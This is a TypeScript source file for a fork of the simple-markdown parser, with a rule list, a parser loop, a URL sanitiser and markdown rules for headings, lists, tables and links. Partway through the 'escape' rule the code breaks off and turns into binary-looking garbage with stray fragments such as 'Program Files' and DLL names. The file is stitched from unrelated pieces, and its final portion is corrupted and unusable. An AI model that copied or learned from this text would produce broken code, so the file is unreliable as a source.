// @ts-nocheck // # Simple-Markdown Core // // This is a fork of Khan-academy's Simple-Markdown[1], initially forked in 2022 // to add Svelte support[2], and used for paper clover's q+a markdown flavor. // // 1: https://github.com/Khan/perseus/tree/main/packages/simple-markdown/src // 2: https://github.com/paperclover/svelte-simple-markdown export type Rules = Record; export interface ParserRule { name: string; match: MatchFunction; parse: ParseFunction; quality?: QualityFunction; } export class RuleList extends Array { constructor(input?: ArrayLike) { super(); if (input) { this.push(...Array.from(input)); } } insertBefore(rule: string, newRule: ParserRule): void { const index = this.findIndex((r) => r.name === rule); if (index === -1) { throw new Error(`Rule ${rule} not found`); } this.splice(index, 0, newRule); } insertAfter(rule: string, newRule: ParserRule): void { const index = this.findIndex((r) => r.name === rule); if (index === -1) { throw new Error(`Rule ${rule} not found`); } this.splice(index + 1, 0, newRule); } toRuleObject(): Record { const result: Record = {}; this.forEach((rule) => { result[rule.name] = rule; }); return result; } add(rule: ParserRule): void { this.push(rule); } get(rule: string): ParserRule | undefined { return this.find((r) => r.name === rule); } remove(rule: string): void { const index = this.findIndex((r) => r.name === rule); if (index === -1) { throw new Error(`Rule ${rule} not found`); } this.splice(index, 1); } clone() { return new RuleList(this); } } /** * Creates a parser for a given set of rules, with the precedence * specified as a list of rules. * * @param rules * an object containing * rule type -> {match, order, parse} objects * (lower order is higher precedence) * @param [defaultState] * * @returns * The resulting parse function, with the following parameters: * @source: the input source string to be parsed * @state: an optional object to be threaded through parse * calls. Allows clients to add stateful operations to * parsing, such as keeping track of how many levels deep * some nesting is. For an example use-case, see passage-ref * parsing in src/widgets/passage/passage-markdown.jsx */ export function createParser( ruleListInput: RuleList, defaultState: Partial = {}, ) { let rules = ruleListInput.toRuleObject(); let ruleList = Object.keys(rules); let latestState: ParserState; let nestedParse = function (source: string, state?: ParserState) { let result: ASTNode[] = []; state = state || latestState; latestState = state; while (source) { // store the best match, it's rule, and quality: let ruleType = null; let rule = null; let capture = null; let quality = NaN; // loop control variables: let i = 0; let currRuleType = ruleList[0]; let currRule = rules[currRuleType]; do { let currCapture = currRule.match(source, state); if (currCapture) { let currQuality = currRule.quality ? currRule.quality(currCapture, state) : 0; // This should always be true the first time because // the initial quality is NaN (that's why there's the // condition negation). if (!(currQuality <= quality)) { ruleType = currRuleType; rule = currRule; capture = currCapture; quality = currQuality; } } // Move on to the next item. // Note that this makes `currRule` be the next item i++; currRuleType = ruleList[i]; currRule = rules[currRuleType]; } while ( // keep looping while we're still within the ruleList currRule && // if we don't have a match yet, continue (!capture || // or if we have a match, but the next rule is // at the same order, and has a quality measurement // functions, then this rule must have a quality // measurement function (since they are sorted before // those without), and we need to check if there is // a better quality match currRule.quality) ); if (!rule || !capture || !ruleType) { throw new Error( "Could not find a matching rule for the below " + "content. The rule with highest `order` should " + "always match content provided to it. Check " + "the definition of `match` for '" + ruleList[ruleList.length - 1] + "'. It seems to not match the following source:\n" + source, ); } if (capture.index) { // If present and non-zero, i.e. a non-^ regexp result: throw new Error( "`match` must return a capture starting at index 0 " + "(the current parse index). Did you forget a ^ at the " + "start of the RegExp?", ); } let parsed = rule.parse(capture, nestedParse, state); // We maintain the same object here so that rules can // store references to the objects they return and // modify them later. (oops sorry! but this adds a lot // of power--see reflinks.) // We also let rules override the default type of // their parsed node if they would like to, so that // there can be a single output function for all links, // even if there are several rules to parse them. if (!parsed.type) { parsed.type = ruleType; } // Collapse text nodes if ( parsed.type === "text" && result[result.length - 1]?.type === "text" ) { result[result.length - 1].content += parsed.content; } else { result.push(parsed as ASTNode); } state.prevCapture = capture; source = source.substring(state.prevCapture[0].length); } return result; }; let outerParse = function ( source: string, state: ParserState = { inline: false }, ) { latestState = populateInitialState(state, defaultState); if (!latestState.inline && !latestState.disableAutoBlockNewlines) { source = source + "\n\n"; } // We store the previous capture so that match functions can // use some limited amount of lookbehind. Lists use this to // ensure they don't match arbitrary '- ' or '* ' in inline // text (see the list rule for more information). This stores // the full regex capture object, if there is one. latestState.prevCapture = undefined; return nestedParse(preprocess(source), latestState); }; return outerParse; } type Multiple = T | T[]; type Nullable = T | null | undefined; export type MatchFunction = ( source: string, state: ParserState, ) => Nullable; export type Parser = (source: string, state?: ParserState) => ASTNode[]; export type ParseFunction = ( source: RegExpMatchArray, nestedParse: Parser, state: ParserState, ) => TypeOptionalASTNode; export type QualityFunction = ( capture: RegExpMatchArray, state: ParserState, ) => number; export interface ParserState { inline: boolean; prevCapture?: RegExpMatchArray; [key: string]: any; } export interface ASTNode { type: string; content?: ASTNode[] | string; [key: string]: any; } export type TypeOptionalASTNode = Omit & { type?: string }; export interface RefNode { type: string; content?: Multiple; target?: string; title?: string; alt?: string; } /** Creates a match function for an inline scoped element from a regex */ export function inlineRegex(regex: RegExp): MatchFunction { return (source, state) => { if (state.inline) { return regex.exec(source); } else { return null; } }; } /** Creates a match function for a block scoped element from a regex */ export function blockRegex(regex: RegExp): MatchFunction { return (source, state) => { if (state.inline) { return null; } else { return regex.exec(source); } }; } /** Creates a match function from a regex, ignoring block/inline scope */ export function anyScopeRegex(regex: RegExp): MatchFunction { return (source) => { return regex.exec(source); }; } const UNESCAPE_URL_R = /\\([^0-9A-Za-z\s])/g; export function unescapeUrl(rawUrlString: string) { return rawUrlString.replace(UNESCAPE_URL_R, "$1"); } /** * Parse some content with the parser `parse`, with state.inline * set to true. Useful for block elements; not generally necessary * to be used by inline elements (where state.inline is already true. */ export function parseInline( parse: Parser, content: string, state: ParserState, ) { const isCurrentlyInline = state.inline || false; state.inline = true; const result = parse(content, state); state.inline = isCurrentlyInline; return result; } export function parseBlock(parse: Parser, content: string, state: ParserState) { const isCurrentlyInline = state.inline || false; state.inline = false; const result = parse(content + "\n\n", state); state.inline = isCurrentlyInline; return result; } export function parseCaptureInline( capture: RegExpMatchArray, parse: Parser, state: ParserState, ) { return { content: parseInline(parse, capture[1], state), }; } export function ignoreCapture() { return {}; } export function sanitizeUrl(url?: string) { if (url == null) { return null; } try { const prot = new URL(url, "https://localhost").protocol; if ( prot.indexOf("javascript:") === 0 || prot.indexOf("vbscript:") === 0 || prot.indexOf("data:") === 0 ) { return null; } } catch (e) { // invalid URLs should throw a TypeError // see for instance: `new URL("");` return null; } return url; } const CR_NEWLINE_R = /\r\n?/g; const TAB_R = /\t/g; const FORMFEED_R = /\f/g; /** * Turn various whitespace into easy-to-process whitespace */ function preprocess(source: string) { return source.replace(CR_NEWLINE_R, "\n").replace(FORMFEED_R, "").replace( TAB_R, " ", ); } function populateInitialState( givenState: Partial, defaultState: Partial, ) { let state = givenState || {}; for (let prop in defaultState) { if (Object.prototype.hasOwnProperty.call(defaultState, prop)) { state[prop] = defaultState[prop]; } } return state as ParserState; } // recognize a `*` `-`, `+`, `1.`, `2.`... list bullet const LIST_BULLET = "(?:[*+-]|\\d+\\.)"; // recognize the start of a list item: // leading space plus a bullet plus a space (` * `) const LIST_ITEM_PREFIX = "( *)(" + LIST_BULLET + ") +"; const LIST_ITEM_PREFIX_R = new RegExp("^" + LIST_ITEM_PREFIX); // recognize an individual list item: // * hi // this is part of the same item // // as is this, which is a new paragraph in the same item // // * but this is not part of the same item const LIST_ITEM_R = new RegExp( LIST_ITEM_PREFIX + "[^\\n]*(?:\\n" + "(?!\\1" + LIST_BULLET + " )[^\\n]*)*(\n|$)", "gm", ); const BLOCK_END_R = /\n{2,}$/; const INLINE_CODE_ESCAPE_BACKTICKS_R = /^ (?= *`)|(` *) $/g; // recognize the end of a paragraph block inside a list item: // two or more newlines at end end of the item const LIST_BLOCK_END_R = BLOCK_END_R; const LIST_ITEM_END_R = / *\n+$/; // check whether a list item has paragraphs: if it does, // we leave the newlines at the end const LIST_R = new RegExp( "^( *)(" + LIST_BULLET + ") " + "[\\s\\S]+?(?:\n{2,}(?! )" + "(?!\\1" + LIST_BULLET + " )\\n*" + // the \\s*$ here is so that we can parse the inside of nested // lists, where our content might end before we receive two `\n`s "|\\s*\n*$)", ); const LIST_LOOKBEHIND_R = /(?:^|\n)( *)$/; const TABLES = (function () { const TABLE_ROW_SEPARATOR_TRIM = /^ *\| *| *\| *$/g; const TABLE_CELL_END_TRIM = / *$/; const TABLE_RIGHT_ALIGN = /^ *-+: *$/; const TABLE_CENTER_ALIGN = /^ *:-+: *$/; const TABLE_LEFT_ALIGN = /^ *:-+ *$/; // TODO: This needs a real type const parseTableAlignCapture = (alignCapture: string) => { if (TABLE_RIGHT_ALIGN.test(alignCapture)) { return "right"; } else if (TABLE_CENTER_ALIGN.test(alignCapture)) { return "center"; } else if (TABLE_LEFT_ALIGN.test(alignCapture)) { return "left"; } else { return null; } }; const parseTableAlign = (source: string, trimEndSeparators: boolean) => { if (trimEndSeparators) { source = source.replace(TABLE_ROW_SEPARATOR_TRIM, ""); } const alignText = source.trim().split("|"); return alignText.map(parseTableAlignCapture); }; const parseTableRow = ( source: string, parse: Parser, state: ParserState, trimEndSeparators: boolean, ) => { const prevInTable = state.inTable; state.inTable = true; const tableRow = parse(source.trim(), state); state.inTable = prevInTable; const cells: ASTNode[][] = [[]]; tableRow.forEach(function (node, i) { if (node.type === "tableSeparator") { // Filter out empty table separators at the start/end: if (!trimEndSeparators || (i !== 0 && i !== tableRow.length - 1)) { // Split the current row: cells.push([]); } } else { if ( typeof node.content === "string" && (tableRow[i + 1] == null || tableRow[i + 1].type === "tableSeparator") ) { node.content = node.content.replace(TABLE_CELL_END_TRIM, ""); } cells[cells.length - 1].push(node); } }); return cells; }; /** * @param {string} source * @param {SimpleMarkdown.Parser} parse * @param {SimpleMarkdown.State} state * @param {boolean} trimEndSeparators * @returns {SimpleMarkdown.ASTNode[][]} */ const parseTableCells = function ( source: string, parse: Parser, state: ParserState, trimEndSeparators: boolean, ) { const rowsText = source.trim().split("\n"); return rowsText.map(function (rowText) { return parseTableRow(rowText, parse, state, trimEndSeparators); }); }; /** * @param {boolean} trimEndSeparators * @returns {SimpleMarkdown.SingleNodeParseFunction} */ const parseTable = function (trimEndSeparators: boolean) { return function ( capture: RegExpMatchArray, parse: Parser, state: ParserState, ) { state.inline = true; const header = parseTableRow(capture[1], parse, state, trimEndSeparators); const align = parseTableAlign(capture[2], trimEndSeparators); const cells = parseTableCells( capture[3], parse, state, trimEndSeparators, ); state.inline = false; return { type: "table", header: header, align: align, cells: cells, }; }; }; return { parseTable: parseTable(true), parseNpTable: parseTable(false), TABLE_REGEX: /^ *(\|.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/, NPTABLE_REGEX: /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/, }; })(); const LINK_INSIDE = "(?:\\[[^\\]]*\\]|[^\\[\\]]|\\](?=[^\\[]*\\]))*"; const LINK_HREF_AND_TITLE = "\\s*?(?:\\s+['\"]([\\s\\S]*?)['\"])?\\s*"; const AUTOLINK_MAILTO_CHECK_R = /mailto:/i; function parseRef( capture: RegExpMatchArray, state: ParserState, refNode: RefNode, ) { const ref = (capture[2] || capture[1]).replace(/\s+/g, " ").toLowerCase(); // We store information about previously seen defs on // state._defs (_ to deconflict with client-defined // state). If the def for this reflink/refimage has // already been seen, we can use its target/source // and title here: if (state._defs && state._defs[ref]) { const def = state._defs[ref]; // `refNode` can be a link or an image. Both use // target and title properties. refNode.target = def.target; refNode.title = def.title; } // In case we haven't seen our def yet (or if someone // overwrites that def later on), we add this node // to the list of ref nodes for that def. Then, when // we find the def, we can modify this link/image AST // node :). // I'm sorry. state._refs = state._refs || {}; state._refs[ref] = state._refs[ref] || []; state._refs[ref].push(refNode); return refNode; } export const defaultRules = new RuleList(); { defaultRules.add({ name: "heading", match: blockRegex(/^ *(#{1,6})([^\n]+?)#* *(?:\n *)+\n/), parse: function (capture, parse, state) { return { level: capture[1].length, content: parseInline(parse, capture[2].trim(), state), }; }, }); defaultRules.add({ name: "nptable", match: blockRegex(TABLES.NPTABLE_REGEX), parse: TABLES.parseNpTable, }); defaultRules.add({ name: "lheading", match: blockRegex(/^([^\n]+)\n *(=|-){3,} *(?:\n *)+\n/), parse(capture, parse, state) { return { type: "heading", level: capture[2] === "=" ? 1 : 2, content: parseInline(parse, capture[1], state), }; }, }); defaultRules.add({ name: "hr", match: blockRegex(/^( *[-*_]){3,} *(?:\n *)+\n/), parse: ignoreCapture, }); defaultRules.add({ name: "codeBlock", match: blockRegex(/^(?: {4}[^\n]+\n*)+(?:\n *)+\n/), parse(capture) { const content = capture[0].replace(/^ {4}/gm, "").replace(/\n+$/, ""); return { lang: undefined, content: content, }; }, }); defaultRules.add({ name: "fence", match: blockRegex( /^ *(`{3,}|~{3,}) *(?:(\S+) *)?\n([\s\S]+?)\n?\1 *(?:\n *)+\n/, ), parse(capture) { return { type: "codeBlock", lang: capture[2] || undefined, content: capture[3], }; }, }); defaultRules.add({ name: "blockQuote", match: blockRegex(/^( *>[^\n]+(\n[^\n]+)*\n*)+\n{2,}/), parse(capture, parse, state) { const content = capture[0].replace(/^ *> ?/gm, ""); return { content: parse(content, state), }; }, }); defaultRules.add({ name: "list", match(source, state) { // We only want to break into a list if we are at the start of a // line. This is to avoid parsing "hi * there" with "* there" // becoming a part of a list. // You might wonder, "but that's inline, so of course it wouldn't // start a list?". You would be correct! Except that some of our // lists can be inline, because they might be inside another list, // in which case we can parse with inline scope, but need to allow // nested lists inside this inline scope. const prevCaptureStr = state.prevCapture == null ? "" : state.prevCapture[0]; const isStartOfLineCapture = LIST_LOOKBEHIND_R.exec(prevCaptureStr); const isListBlock = state._list || !state.inline; if (isStartOfLineCapture && isListBlock) { source = isStartOfLineCapture[1] + source; return LIST_R.exec(source); } else { return null; } }, parse(capture, parse, state) { const bullet = capture[2]; const ordered = bullet.length > 1; const start = ordered ? +bullet : undefined; // We know this will match here, because of how the regexes are defined // eslint-disable-next-line @typescript-eslint/no-non-null-assertion const items = capture[0].replace(LIST_BLOCK_END_R, "\n").match( LIST_ITEM_R, )!; let lastItemWasAParagraph = false; const itemContent = items.map(function (item, i) { // We need to see how far indented this item is: const prefixCapture = LIST_ITEM_PREFIX_R.exec(item); const space = prefixCapture ? prefixCapture[0].length : 0; // And then we construct a regex to "unindent" the subsequent // lines of the items by that amount: const spaceRegex = new RegExp("^ {1," + space + "}", "gm"); // Before processing the item, we need a couple things const content = item // remove indents on trailing lines: .replace(spaceRegex, "") // remove the bullet: .replace(LIST_ITEM_PREFIX_R, ""); // I'm not sur4 why this is necessary again? // Handling "loose" lists, like: // // * this is wrapped in a paragraph // // * as is this // // * as is this const isLastItem = i === items.length - 1; const containsBlocks = content.indexOf("\n\n") !== -1; // Any element in a list is a block if it contains multiple // newlines. The last element in the list can also be a block // if the previous item in the list was a block (this is // because non-last items in the list can end with \n\n, but // the last item can't, so we just "inherit" this property // from our previous element). const thisItemIsAParagraph = containsBlocks || (isLastItem && lastItemWasAParagraph); lastItemWasAParagraph = thisItemIsAParagraph; // backup our state for restoration afterwards. We're going to // want to set state._list to true, and state.inline depending // on our list's looseness. const oldStateInline = state.inline; const oldStateList = state._list; state._list = true; // Parse inline if we're in a tight list, or block if we're in // a loose list. let adjustedContent; if (thisItemIsAParagraph) { state.inline = false; adjustedContent = content.replace(LIST_ITEM_END_R, "\n\n"); } else { state.inline = true; adjustedContent = content.replace(LIST_ITEM_END_R, ""); } const result = parse(adjustedContent, state); // Restore our state before returning state.inline = oldStateInline; state._list = oldStateList; return result; }); return { ordered: ordered, start: start, content: itemContent, }; }, }); defaultRules.add({ name: "def", // TODO: This will match without a blank line before the next // block element, which is inconsistent with most of the rest of // simple-markdown. match: blockRegex( /^ *\[([^\]]+)\]: *]*)>?(?: +["(]([^\n]+)[")])? *\n(?: *\n)*/, ), parse(capture, parse, state) { const def = capture[1].replace(/\s+/g, " ").toLowerCase(); const target = capture[2]; const title = capture[3]; // Look for previous links/images using this def // If any links/images using this def have already been declared, // they will have added themselves to the state._refs[def] list // (_ to deconflict with client-defined state). We look through // that list of reflinks for this def, and modify those AST nodes // with our newly found information now. // Sorry :(. if (state._refs && state._refs[def]) { // `refNode` can be a link or an image state._refs[def].forEach((refNode: RefNode) => { refNode.target = target; refNode.title = title; }); } // Add this def to our map of defs for any future links/images // In case we haven't found any or all of the refs referring to // this def yet, we add our def to the table of known defs, so // that future reflinks can modify themselves appropriately with // this information. state._defs = state._defs || {}; state._defs[def] = { target: target, title: title, }; // return the relevant parsed information // for debugging only. return { def: def, target: target, title: title, }; }, }); defaultRules.add({ name: "table", match: blockRegex(TABLES.TABLE_REGEX), parse: TABLES.parseTable, }); defaultRules.add({ name: "newline", match: blockRegex(/^(?:\n *)*\n/), parse: ignoreCapture, }); defaultRules.add({ name: "paragraph", match: blockRegex(/^((?:[^\n]|\n(?! *\n))+)(?:\n *)+\n/), parse: parseCaptureInline, }); defaultRules.add({ name: "escape", // We don't allow escaping numbers, letters, or spaces here so that @VXLL p8VxK<e@,vDl35 ?????????????????????????????dmain.cpropgtpthrwtUn0tfciwbyR "\DlMainKexIit0"aizPProp g0o `pAd3264TPhOeRwe'p{I*moptPabP NmP 1 PpacONq*fp cinCQ*bpckochpwSuPsysp)eVPr5 hoų`j(0t Proces ratPdpTh VxKx vprinBi1.12Ar428(TRl0aPe) UpgPam64-biP andtoprptngsy1 _Q1Ful 5 h2oR3EXE:CPl\ F s\GtWP ow\0 Zi g1 \2 ng.p x0ZCm le] 9 -UPoppPgrmsq u3p0rlp =1-ine=thQQ-zur%l%$ #ZScq%fyq1i0 Qz   q %.p!%Ifoat%eesvRuePf2ai0DPsbpeFCP(id0rA&p*c]Qcv$VruoPf S 1;/sso0S0P;0 1Ak"PS0r0nkR d fU14tlp ap#ep DL5>o&Q 0s"7<77}7;%~3pJ""iGXKf\0m.s@ o@Bp@As@Hi@sM˾i@oYKN7bd.j@wGaCpCn ovU0m&cRraeb|%"j`"``rZS c 0flU` y]i` iTiU[l z dD ]Lw`acZs`b`g. T :w f u a{ s a Um a hiA : b"?VxK x"64IsZm`nwe+e8-`slmfk ;yKu&r`c?rony^E GaCaR9f?\~ ~ \~~nJ~!*W]~\?1o! PHq4{11~o~~3~~1_?F ~r[pGqh&\cpoP?hUm0??2iJU22 ~q0&~uېrwnTS;d=?py&@pXR.|qXQ\5yprP:xADuAЫI.^т P>kwa0v}np߇+LЅ R!KEP NPLbPQ_Y(_P _)vP>x^&dp3ls)U0q1 zxr W2_tԋ@pmڱwk+rk; w! p4e)lp1  o/ q]\0e_xl"r1 UR зx00:7 20Qi00 (size:h117 52kņDW"UNlPbcnpv-MjkGtMsm@nwA)ntY,:;_6 ob0z9 :7`"b1-:+{:=teVq;b`|sD;(m vc1#I`.f?!h YtPi?~e ;m?E#CA-1`!E4 髧#k7r2h???'+''B;hml7`sly'jL_-l0%'{{uX'gy'Q[m0 Sgl @k@b@ZsWSyE(hm^ve~tH|-EAtY}NzDh^1DLIb•\ul@bw%G2 68 C-Gau6t7?u"u?G?G?G?G ?GrDOTj \ue c.ew"_;yGV`lKkxq?#Be^B @#D17`/;(knoUS`RR?(a?(G1%#07 1We%04n y!a9&}5mNGLI%pPF_o_oL]??325_H۰,qS4%8%9f%LK_]߁`߁%??;B01%5'37U$ /PX7d$P7s/1$C$$8$q+Iߧ7KWM9ߦ 0J^צ^^CPD߀30`80?&Qwj^8V^SIO0r9_^?1EPI1]941M2~Q͝&RPWRFLLL͟^9}_dR__:Cq1]^q2L^ym&T0MPA_IFu_ddp"A K Wr0929216 bytes)Uj(L@ lTh DL CFGMR3.dl wa mppjdFu>pjtM }o[ e+Y: "]:\WinWoSsss ms\" okd u 0x07bED4 (`izG2184 NOJEA^UU!ME@`2uM8@L0AVjΛo@e@tŰkJ7}EϘ1Q9@QKeVPKDEVOBJ?s/s1?&#rEk5&%6%9%TqKkn`Ct%PrPoga `iYaV K xa\/'U'Ce7vs5bi4 t-sM+DNS [PIMLs!ץ1%%D I!Js37`7`&/%%W%2_/s%%ls9EB%,30&ц%Lf߾9%%tP7QdPw~\0~y0??;EP1?%2P%68R%lpb sЖ-0_%/?LC8\?L7LGtޚmPjnPOw\ќ\Ois